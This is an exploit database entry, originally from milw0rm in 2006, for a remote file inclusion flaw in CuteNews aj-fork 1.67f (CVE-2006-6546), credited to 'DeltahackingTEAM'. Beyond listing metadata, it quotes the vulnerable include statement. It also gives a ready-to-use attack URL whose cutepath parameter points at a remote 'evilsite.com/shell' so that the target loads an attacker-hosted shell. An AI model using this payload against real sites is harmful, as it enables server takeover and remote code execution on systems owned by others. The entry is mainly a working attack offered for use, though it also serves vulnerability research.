Exploit CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion

[Exploiter]

EDB-ID

2891

Проверка EDB

1. Пройдено

Автор

DELTAHACKINGTEAM

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-6546

Дата публикации

2006-12-04

===========================================================================================================
DeltasecurityTEAM
www.Deltasecurity.ir
===========================================================================================================
* Portal Name : cutenews aj-fork

* Class = Remote File Inclusion ;
 
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Tanha )

----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------

    include($cutepath.'/inc/plugins.php');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?

----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug

# milw0rm.com [2006-12-04]